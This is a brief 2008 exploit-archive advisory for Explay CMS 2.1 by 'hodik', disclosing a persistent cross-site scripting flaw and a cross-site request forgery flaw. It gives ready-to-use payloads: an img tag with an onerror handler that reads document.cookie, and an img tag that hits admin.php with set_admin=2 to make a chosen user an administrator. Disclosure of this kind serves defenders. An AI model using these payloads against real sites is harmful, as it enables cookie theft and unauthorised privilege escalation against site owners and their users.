id: 3695
date: 09/18/2008
title: Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability
author: hodik
cves: 

=======================================================
Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability
=======================================================


Discovered by hodik


1. Persistent XSS
This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment  <img src="http://google.com" onerror="alert(document.cookie)" />

2. CSRF
User can get admin rights if admin open malicious page that contain, for instance:
<img src="http://explay.localhost/admin.php?name=users&page=1&order=user_id&set_admin=2" />
or merely insert it to comment or article text.



#  0day.today [2023-03-21]  #